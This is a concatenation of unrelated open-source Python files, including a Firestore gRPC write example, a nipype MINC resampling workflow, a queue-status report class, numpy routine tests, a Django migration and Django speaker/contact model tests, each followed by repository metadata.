from google.firestore.v1beta1 import document_pb2_grpc
from google.firestore.v1beta1 import common_pb2
from google.firestore.v1beta1 import common_pb2_grpc
from google.firestore.v1beta1 import write_pb2
from google.firestore.v1beta1 import write_pb2_grpc
from google.protobuf import empty_pb2
from google.protobuf import timestamp_pb2
def first_message(database, write):
messages = [
firestore_pb2.WriteRequest(database = database, writes = [])
]
for msg in messages:
yield msg
def generate_messages(database, writes, stream_id, stream_token):
    # 'writes' can be a list, and additional WriteRequests can be appended to the
    # messages to send multiple Write operations; here we send just one as an example
messages = [
firestore_pb2.WriteRequest(database=database, writes = []),
firestore_pb2.WriteRequest(database=database, writes = [writes], stream_id = stream_id, stream_token = stream_token)
]
for msg in messages:
yield msg
def main():
fl = os.path.dirname(os.path.abspath(__file__))
fn = os.path.join(fl, 'grpc.json')
with open(fn) as grpc_file:
item = json.load(grpc_file)
creds = item["grpc"]["Write"]["credentials"]
credentials = service_account.Credentials.from_service_account_file("{}".format(creds))
scoped_credentials = credentials.with_scopes(['https://www.googleapis.com/auth/datastore'])
http_request = google.auth.transport.requests.Request()
channel = google.auth.transport.grpc.secure_authorized_channel(scoped_credentials, http_request, 'firestore.googleapis.com:443')
stub = firestore_pb2_grpc.FirestoreStub(channel)
database = item["grpc"]["Write"]["database"]
name = item["grpc"]["Write"]["name"]
first_write = write_pb2.Write()
responses = stub.Write(first_message(database, first_write))
for response in responses:
print("Received message %s" % (response.stream_id))
print(response.stream_token)
value_ = document_pb2.Value(string_value = "foo_boo")
update = document_pb2.Document(name=name, fields={"foo":value_})
writes = write_pb2.Write(update_mask=common_pb2.DocumentMask(field_paths = ["foo"]), update=update)
r2 = stub.Write(generate_messages(database, writes, response.stream_id, response.stream_token))
for r in r2:
print(r.write_results)
if __name__ == "__main__":
main()
|
GoogleCloudPlatform/grpc-gcp-python
|
firestore/examples/end2end/src/Write.py
|
Python
|
apache-2.0
| 2,967
| 0.013482
|
from ..subpackage1 import module1g
def func1h():
print('1h')
module1g.func1g()
|
autodefrost/sandbox
|
python/test_rel_import/package1/subpackage2/module1h.py
|
Python
|
apache-2.0
| 88
| 0.011364
|
# Copyright (c) 2005, California Institute of Technology
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the California Institute of Technology nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Author: Andrew Straw
import UniversalLibrary as UL
BoardNum = 0
Gain = UL.BIP5VOLTS
Chan = 0
while 1:
DataValue = UL.cbAIn(BoardNum, Chan, Gain)
EngUnits = UL.cbToEngUnits(BoardNum, Gain, DataValue)
print DataValue, EngUnits
|
astraw/PyUniversalLibrary
|
examples/ulai01.py
|
Python
|
bsd-3-clause
| 1,869
| 0
|
#!/usr/bin/env python3
import os
import os.path
from nipype.interfaces.utility import IdentityInterface, Function
from nipype.interfaces.io import SelectFiles, DataSink, DataGrabber
from nipype.pipeline.engine import Workflow, Node, MapNode
from nipype.interfaces.minc import Resample, BigAverage, VolSymm
import argparse
def create_workflow(
xfm_dir,
xfm_pattern,
atlas_dir,
atlas_pattern,
source_dir,
source_pattern,
work_dir,
out_dir,
name="new_data_to_atlas_space"
):
wf = Workflow(name=name)
wf.base_dir = os.path.join(work_dir)
datasource_source = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_source'
)
datasource_source.inputs.base_directory = os.path.abspath(source_dir)
datasource_source.inputs.template = source_pattern
datasource_xfm = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_xfm'
)
datasource_xfm.inputs.base_directory = os.path.abspath(xfm_dir)
datasource_xfm.inputs.template = xfm_pattern
datasource_atlas = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_atlas'
)
datasource_atlas.inputs.base_directory = os.path.abspath(atlas_dir)
datasource_atlas.inputs.template = atlas_pattern
resample = MapNode(
interface=Resample(
sinc_interpolation=True
),
name='resample_',
iterfield=['input_file', 'transformation']
)
wf.connect(datasource_source, 'outfiles', resample, 'input_file')
wf.connect(datasource_xfm, 'outfiles', resample, 'transformation')
wf.connect(datasource_atlas, 'outfiles', resample, 'like')
bigaverage = Node(
interface=BigAverage(
output_float=True,
robust=False
),
name='bigaverage',
iterfield=['input_file']
)
wf.connect(resample, 'output_file', bigaverage, 'input_files')
datasink = Node(
interface=DataSink(
base_directory=out_dir,
container=out_dir
),
name='datasink'
)
wf.connect([(bigaverage, datasink, [('output_file', 'average')])])
wf.connect([(resample, datasink, [('output_file', 'atlas_space')])])
wf.connect([(datasource_xfm, datasink, [('outfiles', 'transforms')])])
return wf
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--name",
type=str,
required=True
)
parser.add_argument(
"--xfm_dir",
type=str,
required=True
)
parser.add_argument(
"--xfm_pattern",
type=str,
required=True
)
parser.add_argument(
"--source_dir",
type=str,
required=True
)
parser.add_argument(
"--source_pattern",
type=str,
required=True
)
parser.add_argument(
"--atlas_dir",
type=str,
required=True
)
parser.add_argument(
"--atlas_pattern",
type=str,
required=True
)
parser.add_argument(
"--work_dir",
type=str,
required=True
)
parser.add_argument(
"--out_dir",
type=str,
required=True
)
parser.add_argument(
'--debug',
dest='debug',
action='store_true',
help='debug mode'
)
args = parser.parse_args()
if args.debug:
from nipype import config
config.enable_debug_mode()
config.set('execution', 'stop_on_first_crash', 'true')
config.set('execution', 'remove_unnecessary_outputs', 'false')
config.set('execution', 'keep_inputs', 'true')
config.set('logging', 'workflow_level', 'DEBUG')
config.set('logging', 'interface_level', 'DEBUG')
config.set('logging', 'utils_level', 'DEBUG')
wf = create_workflow(
xfm_dir=os.path.abspath(args.xfm_dir),
xfm_pattern=args.xfm_pattern,
atlas_dir=os.path.abspath(args.atlas_dir),
atlas_pattern=args.atlas_pattern,
source_dir=os.path.abspath(args.source_dir),
source_pattern=args.source_pattern,
work_dir=os.path.abspath(args.work_dir),
out_dir=os.path.abspath(args.out_dir),
name=args.name
)
wf.run(
plugin='MultiProc',
plugin_args={
'n_procs': int(
os.environ["NCPUS"] if "NCPUS" in os.environ else os.cpu_count
)
}
)
|
carlohamalainen/volgenmodel-nipype
|
new_data_to_atlas_space.py
|
Python
|
bsd-3-clause
| 4,566
| 0
|
"""
Created on 26 Aug 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
from collections import OrderedDict
from enum import Enum
from scs_core.data.json import JSONReport
# --------------------------------------------------------------------------------------------------------------------
class QueueReport(JSONReport):
"""
classdocs
"""
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct_from_jdict(cls, jdict, skeleton=False):
if not jdict:
return QueueReport(0, ClientStatus.WAITING, False)
length = jdict.get('length')
client_state = ClientStatus[jdict.get('client-state')]
publish_success = jdict.get('publish-success')
return QueueReport(length, client_state, publish_success)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, length, client_state, publish_success):
"""
Constructor
"""
self.__length = length # int or None
        self.__client_state = client_state                  # ClientStatus
self.__publish_success = publish_success # bool
# ----------------------------------------------------------------------------------------------------------------
def queue_state(self):
# client INHIBITED...
if self.client_state == ClientStatus.INHIBITED:
return QueueStatus.INHIBITED
# client WAITING...
if self.client_state == ClientStatus.WAITING:
return QueueStatus.STARTING
# client CONNECTING...
if self.client_state == ClientStatus.CONNECTING:
return QueueStatus.CONNECTING
# client CONNECTED...
if self.client_state == ClientStatus.CONNECTED:
if self.length == 0:
return QueueStatus.WAITING_FOR_DATA
if self.publish_success:
return QueueStatus.PUBLISHING
return QueueStatus.QUEUING
# unknown / error...
return QueueStatus.NONE
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['length'] = self.length
jdict['client-state'] = self.client_state.name
jdict['publish-success'] = self.publish_success
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def length(self):
return self.__length
@length.setter
def length(self, length):
self.__length = length
@property
def client_state(self):
return self.__client_state
@client_state.setter
def client_state(self, client_state):
self.__client_state = client_state
@property
def publish_success(self):
return self.__publish_success
@publish_success.setter
def publish_success(self, publish_success):
self.__publish_success = publish_success
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "QueueReport:{length:%s, client_state:%s, publish_success:%s}" % \
(self.length, self.client_state, self.publish_success)
# --------------------------------------------------------------------------------------------------------------------
class ClientStatus(Enum):
"""
    The connection state of the messaging client
"""
NONE = 0
INHIBITED = 1
WAITING = 2
CONNECTING = 3
CONNECTED = 4
# --------------------------------------------------------------------------------------------------------------------
class QueueStatus(Enum):
"""
classdocs
"""
NONE = 1
INHIBITED = 2
STARTING = 3
CONNECTING = 4
WAITING_FOR_DATA = 5
PUBLISHING = 6
QUEUING = 7
CLEARING = 8
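# --------------------------------------------------------------------------------------------------------------------
# Illustrative usage (a sketch added for clarity, not part of the original module; the values are hypothetical):
#
#   report = QueueReport(10, ClientStatus.CONNECTED, True)
#   report.queue_state()      # -> QueueStatus.PUBLISHING (connected, queue non-empty, last publish succeeded)
#   report.as_json()          # -> OrderedDict([('length', 10), ('client-state', 'CONNECTED'), ('publish-success', True)])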
|
south-coast-science/scs_core
|
src/scs_core/data/queue_report.py
|
Python
|
mit
| 4,239
| 0.006841
|
#!/usr/bin/env python
import numpy as np
from scipy import special
from ..routines import median, mahalanobis, gamln, psi
from nose.tools import assert_true
from numpy.testing import assert_almost_equal, assert_equal, TestCase
class TestAll(TestCase):
def test_median(self):
x = np.random.rand(100)
assert_almost_equal(median(x), np.median(x))
def test_median2(self):
x = np.random.rand(101)
assert_equal(median(x), np.median(x))
def test_median3(self):
x = np.random.rand(10, 30, 11)
assert_almost_equal(np.squeeze(median(x,axis=1)), np.median(x,axis=1))
def test_mahalanobis0(self):
x = np.ones(100)
A = np.eye(100)
mah = 100.
f_mah = mahalanobis(x, A)
assert_almost_equal(mah, f_mah, decimal=1)
def test_mahalanobis1(self):
x = np.random.rand(100)
A = np.random.rand(100, 100)
A = np.dot(A.transpose(), A) + np.eye(100)
mah = np.dot(x, np.dot(np.linalg.inv(A), x))
f_mah = mahalanobis(x, A)
assert_almost_equal(mah, f_mah, decimal=1)
def test_mahalanobis2(self):
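        # stacked case: mahalanobis() should handle trailing axes of covariance matrices, so one randomly
        # chosen (i, j) slice is checked against the explicit inner-product computation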
x = np.random.rand(100,3,4)
Aa = np.zeros([100,100,3,4])
for i in range(3):
for j in range(4):
A = np.random.rand(100,100)
A = np.dot(A.T, A)
Aa[:,:,i,j] = A
i = np.random.randint(3)
j = np.random.randint(4)
mah = np.dot(x[:,i,j], np.dot(np.linalg.inv(Aa[:,:,i,j]), x[:,i,j]))
f_mah = (mahalanobis(x, Aa))[i,j]
assert_true(np.allclose(mah, f_mah))
def test_gamln(self):
for x in (0.01+100*np.random.random(50)):
scipy_gamln = special.gammaln(x)
my_gamln = gamln(x)
assert_almost_equal(scipy_gamln, my_gamln)
def test_psi(self):
for x in (0.01+100*np.random.random(50)):
scipy_psi = special.psi(x)
my_psi = psi(x)
assert_almost_equal(scipy_psi, my_psi)
if __name__ == "__main__":
import nose
nose.run(argv=['', __file__])
|
arokem/nipy
|
nipy/labs/utils/tests/test_misc.py
|
Python
|
bsd-3-clause
| 2,093
| 0.010511
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.12 on 2017-05-25 20:11
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('anagrafica', '0046_delega_stato'),
]
operations = [
migrations.AlterIndexTogether(
name='delega',
index_together=set([('persona', 'tipo', 'stato'), ('inizio', 'fine', 'tipo', 'oggetto_id', 'oggetto_tipo'), ('tipo', 'oggetto_tipo', 'oggetto_id'), ('persona', 'inizio', 'fine', 'tipo'), ('persona', 'inizio', 'fine', 'tipo', 'stato'), ('persona', 'stato'), ('persona', 'inizio', 'fine'), ('inizio', 'fine', 'tipo'), ('persona', 'inizio', 'fine', 'tipo', 'oggetto_id', 'oggetto_tipo'), ('persona', 'tipo'), ('oggetto_tipo', 'oggetto_id'), ('inizio', 'fine', 'stato'), ('inizio', 'fine')]),
),
]
|
CroceRossaItaliana/jorvik
|
anagrafica/migrations/0047_auto_20170525_2011.py
|
Python
|
gpl-3.0
| 865
| 0.001156
|
# coding: utf-8
"""
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.test import TestCase
from django.core.exceptions import ValidationError
from eventex.core.models import Speaker, Contact
class SpeakerModelTest(TestCase):
"""
Test class.
"""
def setUp(self):
"""
Test initialization.
"""
self.speaker = Speaker(
name='Davi Garcia',
slug='davi-garcia',
url='http://www.davigarcia.com.br',
description='Passionate software developer!'
)
self.speaker.save()
def test_create(self):
"""
Speaker instance must be saved.
"""
self.assertEqual(1, self.speaker.pk)
def test_unicode(self):
"""
Speaker string representation should be the name.
"""
self.assertEqual(u'Davi Garcia', unicode(self.speaker))
class ContactModelTest(TestCase):
"""
Test class.
"""
def setUp(self):
"""
Test initialization.
"""
self.speaker = Speaker.objects.create(
name='Davi Garcia',
slug='davi-garcia',
url='http://www.davigarcia.com.br',
description='Passionate software developer!'
)
def test_email(self):
"""
Speaker should have email contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='E',
value='henrique@bastos.net'
)
self.assertEqual(1, contact.pk)
def test_phone(self):
"""
        Speaker should have phone contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='P',
value='21-987654321'
)
self.assertEqual(1, contact.pk)
def test_fax(self):
"""
        Speaker should have fax contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='F',
value='21-123456789'
)
self.assertEqual(1, contact.pk)
def test_kind(self):
"""
Contact kind must be limited to E, P or F.
"""
contact = Contact(speaker=self.speaker, kind='A', value='B')
self.assertRaises(ValidationError, contact.full_clean)
def test_unicode(self):
"""
Contact string representation should be value.
"""
contact = Contact(
speaker=self.speaker,
kind='E',
value='davivcgarcia@gmail.com')
self.assertEqual(u'davivcgarcia@gmail.com', unicode(contact))
|
davivcgarcia/wttd-15
|
eventex/core/tests/test_models_speaker_contact.py
|
Python
|
gpl-3.0
| 3,199
| 0
|